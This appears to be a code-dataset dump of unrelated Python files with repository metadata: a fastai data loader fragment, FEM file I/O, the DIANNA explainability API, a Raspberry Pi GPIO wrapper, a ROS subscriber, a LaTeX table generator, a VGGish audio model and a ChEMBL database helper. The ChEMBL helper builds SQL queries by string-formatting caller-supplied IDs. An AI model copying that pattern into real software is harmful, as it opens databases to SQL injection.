shuffle_nonempty_imgs=self.shuffle_nonempty_imgs
)
if model_name in ["multihead_tilecat", "multihead_tilecat_attention"] and self.is_train:
# create isup LabelItemList
isup_labels = (
(__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade']))
)
# create the dict to hold all LabelItemLists
multitask_project = {
'isup': {
'label_lists': isup_labels,
}
}
# add tile cancer categories to the dict
for i in range(self.N):
tilecat = (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=[f'cancer_status_{i}']))
multitask_project[f'tilecat_{i}'] = {
'label_lists': tilecat,
}
ItemLists.label_from_mt_project = label_from_mt_project
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_mt_project(multitask_project)
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
else: # Defaults to Iafoss
if self.is_ordinal:
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade'], label_cls=None, label_delim=',')
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
else:
return (__MImageItemList()
.split_by_idx(self.df.index[self.df.split == fold].tolist())
.label_from_df(cols=['isup_grade'], label_cls=FloatList if regr==True else None)
.transform(self.tfms,
size=self.sz,
padding_mode='zeros')
.databunch(bs=self.bs,
num_workers=self.num_workers)
)
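A hedged construction sketch; the paths, normalization stats, and tile count below are placeholders, and the tile images plus train.csv must exist on disk for _prepare_data to succeed:

    sampler = FoldSampler(TRAIN='train_tiles/', LABELS='train.csv',
                          mean=[0.90, 0.90, 0.90], std=[0.10, 0.10, 0.10],
                          N=12, sz=128, bs=16, n_folds=4)
    data = sampler.get_data(fold=0)   # fastai databunch for fold 0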
| 40.819095
| 111
| 0.519266
| 891
| 8,123
| 4.530864
| 0.225589
| 0.020808
| 0.023532
| 0.013624
| 0.232351
| 0.224919
| 0.208075
| 0.208075
| 0.182314
| 0.182314
| 0
| 0.005217
| 0.386434
| 8,123
| 198
| 112
| 41.025253
| 0.804775
| 0.056752
| 0
| 0.164706
| 0
| 0
| 0.050621
| 0.010464
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0.005882
| 0.170588
| 0.005882
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b02e549c87583bcf554b71f024544d0bb0dac0a
| 2,735
|
py
|
Python
|
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
FEM/src/FemIo.py
|
BartSiwek/Neurotransmitter2D
|
200c1b7e74de0786b1bb52d456e227f9d64cebc6
|
[
"MIT"
] | null | null | null |
import scipy
import PslgIo, ElementAwarePslg
def loadEle(filename):
pslg = ElementAwarePslg.ElementAwarePslg()
file = open(filename, "r")
try:
PslgIo.readFromFile(file, pslg, filename)
finally:
file.close()
return pslg
def saveFem(filename, femResults):
#Open the file
file = open(filename, "w")
#Header
    saveHeader(file, len(femResults), femResults[0][1].shape[0])
#Actual contents
try:
for solutionDesc in femResults:
saveResult(file, solutionDesc)
finally:
file.close()
return
def saveResult(file, solutionDesc):
file.write(str(solutionDesc[0]) + "\n")
for i in range(0, solutionDesc[1].shape[0]):
line = "%.12f" % solutionDesc[1][i,0]
file.write(line + "\n")
file.flush()
def saveRelease(file, releaseDesc):
file.write(str(releaseDesc[0]) + "\t" + str(releaseDesc[1]) + "\n")
file.flush()
def saveHeader(file, timeSteps, variableNumber):
line = str(timeSteps) + " " + str(variableNumber) + "\n"
file.write(line)
file.flush()
def loadFem(filename):
results = []
file = open(filename, "r")
try:
resultNumber, n = readHeader(file)
for i in range(0, resultNumber):
time = float(getLine(file))
z = []
for j in range(0, n):
currentZ = float(getLine(file))
z.append(currentZ)
results.append((time, z))
finally:
file.close()
return results
def loadLastFemresult(filename):
result = None
file = open(filename, "r")
try:
#Skip header
resultNumber, n = readHeader(file)
currentLine = getLine(file)
while len(currentLine) > 0:
#Get the current record
time = float(currentLine)
z = []
for j in range(0, n):
currentZ = float(getLine(file))
z.append(currentZ)
result = (time, z)
#Get next line
currentLine = getLine(file)
except:
pass
finally:
file.close()
if(result is not None):
return (result[0], scipy.array([result[1]]).transpose())
else:
return None
def readHeader(file):
headerLine = getLine(file)
if len(headerLine) > 0:
        tokens = headerLine.split()
if len(tokens) != 2:
raise IOError("Invalid file format (header should contain exactly two positive integers)")
return (int(tokens[0]), int(tokens[1]))
else:
raise IOError("Invalid file format (header not found)")
def getLine(file):
    return file.readline().strip()
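An illustrative round-trip under the format this module writes (the filename is a placeholder, and scipy.array is the legacy alias the module itself relies on):

    import scipy

    z0 = scipy.array([[0.0], [1.5], [3.0]])        # one 3x1 solution vector
    saveFem('run.fem', [(0.0, z0)])                # writes header '1 3'
    print(loadFem('run.fem'))                      # [(0.0, [0.0, 1.5, 3.0])]
    print(loadLastFemresult('run.fem'))            # (0.0, 3x1 array)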
| 27.35
| 102
| 0.571115
| 301
| 2,735
| 5.189369
| 0.30897
| 0.049296
| 0.040973
| 0.03265
| 0.166453
| 0.112676
| 0.067862
| 0.067862
| 0.067862
| 0.067862
| 0
| 0.012137
| 0.30713
| 2,735
| 100
| 103
| 27.35
| 0.812137
| 0.02925
| 0
| 0.395062
| 0
| 0
| 0.049434
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0.012346
| 0.037037
| 0.012346
| 0.234568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b04376d12aae979563b6b36b34ff0b76d2dcff0
| 3,466
|
py
|
Python
|
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
dianna/__init__.py
|
cffbots/dianna
|
21e272dce2862747a5109341b622798f667d9248
|
[
"Apache-2.0"
] | null | null | null |
"""
DIANNA: Deep Insight And Neural Network Analysis.
Modern scientific challenges are often tackled with (Deep) Neural Networks (DNN).
Despite their high predictive accuracy, DNNs lack inherent explainability. Many DNN
users, especially scientists, do not harvest DNNs power because of lack of trust and
understanding of their working.
Meanwhile, the eXplainable AI (XAI) methods offer some post-hoc interpretability and
insight into the DNN reasoning. This is done by quantifying the relevance of individual
features (image pixels, words in text, etc.) with respect to the prediction. These
"relevance heatmaps" indicate how the network has reached its decision directly in the
input modality (images, text, speech etc.) of the data.
There are many Open Source Software (OSS) implementations of these methods, alas,
supporting a single DNN format and the libraries are known mostly by the AI experts.
The DIANNA library supports the best XAI methods in the context of scientific usage
providing their OSS implementation based on the ONNX standard and demonstrations on
benchmark datasets. Representing visually the captured knowledge by the AI system can
become a source of (scientific) insights.
See https://github.com/dianna-ai/dianna
"""
import logging
from onnx_tf.backend import prepare # To avoid Access Violation on Windows with SHAP
from . import methods
from . import utils
logging.getLogger(__name__).addHandler(logging.NullHandler())
__author__ = "DIANNA Team"
__email__ = "dianna-ai@esciencecenter.nl"
__version__ = "0.2.1"
def explain_image(model_or_function, input_data, method, labels=(1,), **kwargs):
"""
Explain an image (input_data) given a model and a chosen method.
Args:
model_or_function (callable or str): The function that runs the model to be explained _or_
            the path to an ONNX model on disk.
input_data (np.ndarray): Image data to be explained
method (string): One of the supported methods: RISE, LIME or KernelSHAP
labels (tuple): Labels to be explained
Returns:
One heatmap (2D array) per class.
"""
explainer = _get_explainer(method, kwargs)
explain_image_kwargs = utils.get_kwargs_applicable_to_function(explainer.explain_image, kwargs)
return explainer.explain_image(model_or_function, input_data, labels, **explain_image_kwargs)
def explain_text(model_or_function, input_data, method, labels=(1,), **kwargs):
"""
Explain text (input_data) given a model and a chosen method.
Args:
model_or_function (callable or str): The function that runs the model to be explained _or_
            the path to an ONNX model on disk.
input_data (string): Text to be explained
method (string): One of the supported methods: RISE or LIME
labels (tuple): Labels to be explained
Returns:
List of (word, index of word in raw text, importance for target class) tuples.
"""
explainer = _get_explainer(method, kwargs)
explain_text_kwargs = utils.get_kwargs_applicable_to_function(explainer.explain_text, kwargs)
return explainer.explain_text(model_or_function, input_data, labels, **explain_text_kwargs)
def _get_explainer(method, kwargs):
method_class = getattr(methods, method)
method_kwargs = utils.get_kwargs_applicable_to_function(method_class.__init__, kwargs)
return method_class(**method_kwargs)
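A minimal sketch of the public API above; the model path and input shape are placeholders, and 'RISE' is one of the method names the docstrings list:

    import numpy as np
    import dianna

    input_data = np.random.rand(28, 28, 1).astype(np.float32)
    heatmaps = dianna.explain_image('mnist_model.onnx', input_data,
                                    method='RISE', labels=(0, 1))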
| 42.790123
| 99
| 0.742643
| 483
| 3,466
| 5.15942
| 0.407867
| 0.028892
| 0.036116
| 0.032103
| 0.369181
| 0.369181
| 0.337079
| 0.243178
| 0.243178
| 0.198234
| 0
| 0.002147
| 0.193883
| 3,466
| 80
| 100
| 43.325
| 0.889764
| 0.644836
| 0
| 0.1
| 0
| 0
| 0.038154
| 0.023957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.2
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b0494a9e41efc09a0891a5e4ffe2bfd4e84d0d3
| 2,925
|
py
|
Python
|
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
printer/gpio.py
|
3DRPP/printer
|
7826c7c82a5331d916d8ea038bd3a44aff6e35b5
|
[
"MIT"
] | null | null | null |
try:
import RPi.GPIO as GPIO
except RuntimeError:
print("Error importing RPi.GPIO! This is probably because you need "
"superuser privileges. You can achieve this by using 'sudo' to run "
"your script")
gpios = [7, 8, 10, 11, 12, 13, 15, 16, 18, 19, 21, 22, 23, 24, 26, 29,
31, 32, 33, 35, 36, 37, 38, 40]
class Pin:
def __init__(self, number, value):
self.number = number
self.value = value
self.mode = 'out'
def set_value(self, value):
try:
GPIO.output(self.number, GPIO.HIGH if value else GPIO.LOW)
except:
pass
self.value = value
def set_mode(self, mode):
if mode == 'in' or mode == 'out':
self.mode = mode
try:
if mode == 'in':
GPIO.setup(self.number, GPIO.IN)
self.value = bool(GPIO.input(self.number))
print("set mode to in (value=" + str(self.value) + ")")
return self.value
else:
GPIO.setup(self.number, GPIO.OUT)
self.value = bool(GPIO.input(self.number))
print("set mode to out (value=" + str(self.value) + ")")
return self.value
except:
return self.value
def switch_value(self):
try:
GPIO.output(self.number, GPIO.LOW if self.value else GPIO.HIGH)
except:
pass
self.value = not self.value
def switch_mode(self):
if self.mode == 'out':
return 'in', self.set_mode('in')
else:
return 'out', self.set_mode('out')
class Header:
def __init__(self):
self.left_pins = []
self.right_pins = []
for x in gpios:
if x % 2 == 1:
self.left_pins.append(Pin(x, False))
else:
self.right_pins.append(Pin(x, False))
def get_value(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
return pin.value
def set_value(self, number, value):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
pin.set_value(value)
break
def switch_value(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
pin.switch_value()
break
def switch_mode(self, number):
for pin in self.left_pins + self.right_pins:
if pin.number == number:
return pin.switch_mode()
header = Header()
try:
GPIO.setmode(GPIO.BOARD)
for id in gpios:
print('Initializing gpio ' + str(id))
GPIO.setup(id, GPIO.OUT, initial=GPIO.LOW)
print('Initialized GPIOs')
except:
print('Could not set GPIO mode to BOARD.')
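A short usage sketch; off a Raspberry Pi the GPIO calls above fail silently, so this only exercises the bookkeeping:

    header.set_value(7, True)             # drive board pin 7 high
    header.switch_value(7)                # toggle it back to low
    mode, value = header.switch_mode(7)   # flip pin 7 to input mode
    print(header.get_value(7))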
| 29.545455
| 79
| 0.523419
| 372
| 2,925
| 4.026882
| 0.258065
| 0.078104
| 0.048064
| 0.053405
| 0.389186
| 0.333111
| 0.280374
| 0.23765
| 0.23765
| 0.23765
| 0
| 0.025932
| 0.367179
| 2,925
| 98
| 80
| 29.846939
| 0.78336
| 0
| 0
| 0.378049
| 0
| 0
| 0.094701
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121951
| false
| 0.02439
| 0.02439
| 0
| 0.256098
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b04e005435865593cbdccc3f6d9e91235157df4
| 1,395
|
py
|
Python
|
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | null | null | null |
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | 1
|
2017-12-14T14:04:24.000Z
|
2017-12-14T16:58:05.000Z
|
simple_joint_subscriber/scripts/joint_subscriber.py
|
itk-thrivaldi/thrivaldi_examples
|
7c00ad4e1b4fa4b0f27c88e8c0147f8105b042fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import rospy # For all things ros with python
# JointState is defined in sensor_msgs.msg
# If you know a message but not where it is
# call rosmsg info MSGNAME from the terminal
from sensor_msgs.msg import JointState
# This tutorial takes heavily from
# http://wiki.ros.org/ROS/Tutorials/WritingPublisherSubscriber(python)
# In this example we make a simple subscriber that listens for JointState
# messages, and prints them. Uses a functional approach.
def message_callback(msg):
"""This function is called on the message every time a message arrives."""
rospy.loginfo("Joint position received:"+str(msg.position))
def joint_listener():
"""Blocking function that sets up node, subscription and waits for
messages."""
# Start ros node
rospy.init_node("joint_listener", anonymous=True)
# Tell the central command we want to hear about /joint_states
rospy.Subscriber("/joint_states", # Topic we subscribe to
JointState, # message type that topic has
message_callback) # function to call when message arrives
rospy.spin()
# If this script is run alone, not just imported:
if __name__ == "__main__":
joint_listener()
# Ensure that the python script is executable by running:
# chmod +x joint_subscriber.py
# Call this script by running:
# rosrun joint_subscriber joint_subscriber.py
| 34.875
| 79
| 0.7319
| 197
| 1,395
| 5.076142
| 0.558376
| 0.039
| 0.026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.194982
| 1,395
| 39
| 80
| 35.769231
| 0.890472
| 0.658781
| 0
| 0
| 0
| 0
| 0.133183
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b0bcb46e200df6f78d9fe78eb07f700564fadd3
| 4,084
|
py
|
Python
|
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | 1
|
2021-11-10T10:28:01.000Z
|
2021-11-10T10:28:01.000Z
|
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | null | null | null |
csv_to_table.py
|
canary-for-cognition/multimodal-ml-framework
|
379963e2815165b28a28c983d32dd17656fba9a9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from pylatex import Document, Section, Tabular, Subsection
import pandas as pd
import sys
def main():
pm = u"\u00B1"
filename = sys.argv[1]
results = pd.read_csv(filename+'.csv')
cols = results.columns
task_fusion = ((results.loc[results['settings']=='overall']).loc[results['model']!='DummyClassifier']).sort_values('model')
reading = ((results.loc[results['settings']=='Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
cookie = ((results.loc[results['settings']=='CookieTheft']).loc[results['model']!='DummyClassifier']).sort_values('model')
memory = ((results.loc[results['settings']=='Memory']).loc[results['model']!='DummyClassifier']).sort_values('model')
pupil = ((results.loc[results['settings']=='PupilCalib']).loc[results['model']!='DummyClassifier']).sort_values('model')
ET_basic = ((results.loc[results['settings']=='ET_basic']).loc[results['model']!='DummyClassifier']).sort_values('model')
Eye = ((results.loc[results['settings']=='Eye']).loc[results['model']!='DummyClassifier']).sort_values('model')
Language = ((results.loc[results['settings']=='Language']).loc[results['model']!='DummyClassifier']).sort_values('model')
Eye_Reading = ((results.loc[results['settings']=='Eye_Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
NLP_Reading = ((results.loc[results['settings']=='NLP_Reading']).loc[results['model']!='DummyClassifier']).sort_values('model')
TextAudio = ((results.loc[results['settings']=='Text+Audio']).loc[results['model']!='DummyClassifier']).sort_values('model')
task_fusion = np.array(task_fusion.dropna()).astype('str')
reading = np.array(reading.dropna()).astype('str')
cookie = np.array(cookie.dropna()).astype('str')
memory = np.array(memory.dropna()).astype('str')
pupil = np.array(pupil.dropna()).astype('str')
ET_basic = np.array(ET_basic.dropna()).astype('str')
Eye = np.array(Eye.dropna()).astype('str')
Language = np.array(Language.dropna()).astype('str')
Eye_Reading = np.array(Eye_Reading.dropna()).astype('str')
NLP_Reading = np.array(NLP_Reading.dropna()).astype('str')
TextAudio = np.array(TextAudio.dropna()).astype('str')
abc = np.array((task_fusion, reading, cookie, memory, pupil, ET_basic, Eye, Language, Eye_Reading, NLP_Reading, TextAudio))
for i in range(len(abc)):
for j in range(len(abc[i])):
if abc[i][j][1] == 'RandomForest':
abc[i][j][1] = 'RF'
elif abc[i][j][1] == 'GausNaiveBayes':
abc[i][j][1] = 'GNB'
elif abc[i][j][1] == 'LogReg':
abc[i][j][1] = 'LR'
geometry_options = {"tmargin": "1cm", "lmargin": "1cm"}
doc = Document(geometry_options=geometry_options)
# for overall task_fusion_result
with doc.create(Section('Results')):
for i in range(len(abc)):
overall = abc[i]
with doc.create(Subsection(overall[0][0])):
with doc.create(Tabular('c c c c c c c c')) as table:
table.add_hline()
table.add_row(('Algo', 'N', 'AUC', 'F1', 'Accuracy', 'Precision', 'Recall', 'Specificity'))
table.add_hline()
for i in range(len(overall)):
table.add_row((overall[i][1], '162',
overall[i][3] + pm + overall[i][12], # roc
overall[i][4] + pm + overall[i][9], # f1
overall[i][2] + pm + overall[i][8], # acc
overall[i][5] + pm + overall[i][10], # prec
overall[i][6] + pm + overall[i][11], # rec
overall[i][7] + pm + overall[i][13])) # spec
doc.generate_pdf(filename, clean_tex=False, compiler='pdflatex')
if __name__ == '__main__':
    main()
| 51.696203
| 131
| 0.578355
| 488
| 4,084
| 4.754098
| 0.256148
| 0.094828
| 0.080603
| 0.118534
| 0.3125
| 0.243103
| 0.228448
| 0.108621
| 0
| 0
| 0
| 0.011698
| 0.225514
| 4,084
| 78
| 132
| 52.358974
| 0.721783
| 0.027669
| 0
| 0.065574
| 0
| 0
| 0.160061
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016393
| false
| 0
| 0.081967
| 0
| 0.098361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b0d0466817dc17050d1085421ef9276feb2fb86
| 2,803
|
py
|
Python
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 26
|
2020-03-25T21:19:33.000Z
|
2022-02-01T15:14:29.000Z
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 7
|
2020-05-31T07:57:05.000Z
|
2021-12-23T10:16:55.000Z
|
torch_audioset/vggish/model.py
|
Guillaume-oso/torch_audioset
|
e8852c53becef811784754a2de9c4617d8db2156
|
[
"MIT"
] | 8
|
2020-10-27T16:22:55.000Z
|
2022-03-28T22:48:07.000Z
|
import os.path as osp
import yaml
import torch.nn as nn
from torch import hub
__all__ = ['get_vggish', 'vggish_category_metadata']
model_urls = {
'vggish': "https://github.com/w-hc/vggish/releases/download/v0.1/vggish_orig.pth",
'vggish_with_classifier': "https://github.com/w-hc/vggish/releases/download/v0.1/vggish_with_classifier.pth"
}
def vggish_category_metadata():
cat_meta_file = osp.join(
osp.dirname(osp.realpath(__file__)), 'classifier_category.yml'
)
with open(cat_meta_file) as f:
cat_meta = yaml.safe_load(f) # [ [cat_name, mid], ... ]
cat_meta = [ {'name': e[0], 'id': e[1]} for e in cat_meta ]
return cat_meta
class VGGish(nn.Module):
def __init__(self):
super().__init__()
self.features = self.make_layers()
self.embeddings = nn.Sequential(
nn.Linear(512 * 4 * 6, 4096),
nn.ReLU(True),
nn.Linear(4096, 4096),
nn.ReLU(True),
nn.Linear(4096, 128),
nn.ReLU(True),
)
@staticmethod
def make_layers():
layer_config = [64, "M", 128, "M", 256, 256, "M", 512, 512, "M"]
in_channels = 1
layers = []
for curr in layer_config:
if curr == "M":
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
else:
conv2d = nn.Conv2d(in_channels, curr, kernel_size=3, padding=1)
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = curr
return nn.Sequential(*layers)
def forward(self, x):
'''
        x: [N, 1, H, W] log-mel patches (canonically [N, 1, 96, 64])
'''
        # It's regrettable that the TensorFlow authors of this model treat the
        # audio signal as a 2D image, hence the 4D [N, 1, H, W] input rather
        # than a 1D [N, C, T] signal
x = self.features(x)
x = x.permute(0, 2, 3, 1) # to tf's [N, H, W, C] order
x = x.reshape(x.shape[0], -1)
x = self.embeddings(x)
return x
class VGGishClassify(VGGish):
'''
    Beware that this is a multi-label, not multi-class, classifier.
'''
def __init__(self, num_hidden_units=100, num_classes=527):
super().__init__()
self.classifier = nn.Sequential(
nn.Linear(128, num_hidden_units),
nn.ReLU(True),
nn.Linear(num_hidden_units, num_classes),
)
def forward(self, x):
x = super().forward(x)
x = self.classifier(x)
return x
def get_vggish(with_classifier=False, pretrained=True):
if with_classifier:
model = VGGishClassify()
url = model_urls['vggish_with_classifier']
else:
model = VGGish()
url = model_urls['vggish']
if pretrained:
state_dict = hub.load_state_dict_from_url(url, progress=True)
model.load_state_dict(state_dict)
return model
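A shape sanity-check sketch; the [N, 1, 96, 64] input (96 frames x 64 mel bins) is inferred from the 512 * 4 * 6 flatten size above, and pretrained=False avoids the weight download:

    import torch

    model = get_vggish(with_classifier=True, pretrained=False)
    x = torch.randn(2, 1, 96, 64)   # dummy log-mel patches
    logits = model(x)               # shape [2, 527], multi-label logits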
| 29.197917
| 112
| 0.576882
| 373
| 2,803
| 4.126005
| 0.351206
| 0.02729
| 0.051982
| 0.023392
| 0.128655
| 0.096166
| 0.096166
| 0.062378
| 0.062378
| 0.062378
| 0
| 0.03672
| 0.29076
| 2,803
| 95
| 113
| 29.505263
| 0.737425
| 0.081698
| 0
| 0.169014
| 0
| 0.028169
| 0.10782
| 0.03594
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098592
| false
| 0
| 0.056338
| 0
| 0.253521
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
7b0d272861a3704f10e9a92801a2d879819c1a06
| 12,584
|
py
|
Python
|
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
common/cuchemcommon/data/helper/chembldata.py
|
dorukozturk/cheminformatics
|
c0fa66dd4f4e6650d7286ae2be533c66b7a2b270
|
[
"Apache-2.0"
] | null | null | null |
import os
import warnings
import pandas
import sqlite3
import logging
from typing import List
from dask import delayed, dataframe
from contextlib import closing
from cuchemcommon.utils.singleton import Singleton
from cuchemcommon.context import Context
warnings.filterwarnings("ignore", message=r"deprecated", category=FutureWarning)
logger = logging.getLogger(__name__)
BATCH_SIZE = 100000
ADDITIONAL_FIELD = ['canonical_smiles', 'transformed_smiles']
IMP_PROPS = [
'alogp',
'aromatic_rings',
'full_mwt',
'psa',
'rtb']
IMP_PROPS_TYPE = [pandas.Series([], dtype='float64'),
pandas.Series([], dtype='int64'),
pandas.Series([], dtype='float64'),
pandas.Series([], dtype='float64'),
pandas.Series([], dtype='int64')]
ADDITIONAL_FIELD_TYPE = [pandas.Series([], dtype='object'),
                         pandas.Series([], dtype='object')]
SQL_MOLECULAR_PROP = """
SELECT md.molregno as molregno, md.chembl_id, cp.*, cs.*
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.molregno in (%s)
"""
# DEPRECATED. Please add code to DAO classes.
class ChEmblData(object, metaclass=Singleton):
def __init__(self, fp_type):
context = Context()
db_file = context.get_config('data_mount_path', default='/data')
db_file = os.path.join(db_file, 'db/chembl_27.db')
if not os.path.exists(db_file):
logger.error('%s not found', db_file)
raise Exception('{} not found'.format(db_file))
self.fp_type = fp_type
self.chembl_db = 'file:%s?mode=ro' % db_file
logger.info('ChEMBL database: %s...' % self.chembl_db)
def fetch_props_by_molregno(self, molregnos):
"""
Returns compound properties and structure filtered by ChEMBL IDs along
with a list of columns.
"""
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = SQL_MOLECULAR_PROP % " ,".join(list(map(str, molregnos)))
cur.execute(select_stmt)
cols = list(map(lambda x: x[0], cur.description))
return cols, cur.fetchall()
def fetch_props_by_chemble(self, chemble_ids):
"""
Returns compound properties and structure filtered by ChEMBL IDs along
with a list of columns.
"""
sql_stml = """
SELECT md.molregno as molregno, md.chembl_id, cp.*, cs.*
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.chembl_id in (%s)
"""
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = sql_stml % "'%s'" % "','".join([x.strip().upper() for x in chemble_ids])
cur.execute(select_stmt)
cols = list(map(lambda x: x[0], cur.description))
return cols, cur.fetchall()
def fetch_molregno_by_chemblId(self, chemblIds):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT md.molregno as molregno
FROM compound_properties cp,
compound_structures cs,
molecule_dictionary md
WHERE cp.molregno = md.molregno
AND md.molregno = cs.molregno
AND md.chembl_id in (%s)
''' % "'%s'" % "','".join(chemblIds)
cur.execute(select_stmt)
return cur.fetchall()
def fetch_id_from_chembl(self, new_molecules: List):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT cs.molregno as molregno, md.chembl_id as chembl_id,
cs.canonical_smiles as smiles
FROM compound_structures cs,
molecule_dictionary md
WHERE md.molregno = cs.molregno
AND md.chembl_id in (%s)
''' % "'%s'" % "','".join([x.strip().upper() for x in new_molecules])
cur.execute(select_stmt)
return cur.fetchall()
def fetch_chemblId_by_molregno(self, molregnos):
logger.debug('Fetch ChEMBL ID using molregno...')
with closing(sqlite3.connect(self.chembl_db, uri=True)) as con, con, \
closing(con.cursor()) as cur:
select_stmt = '''
SELECT md.chembl_id as chembl_id
FROM molecule_dictionary md
WHERE md.molregno in (%s)
''' % ", ".join(list(map(str, molregnos)))
cur.execute(select_stmt)
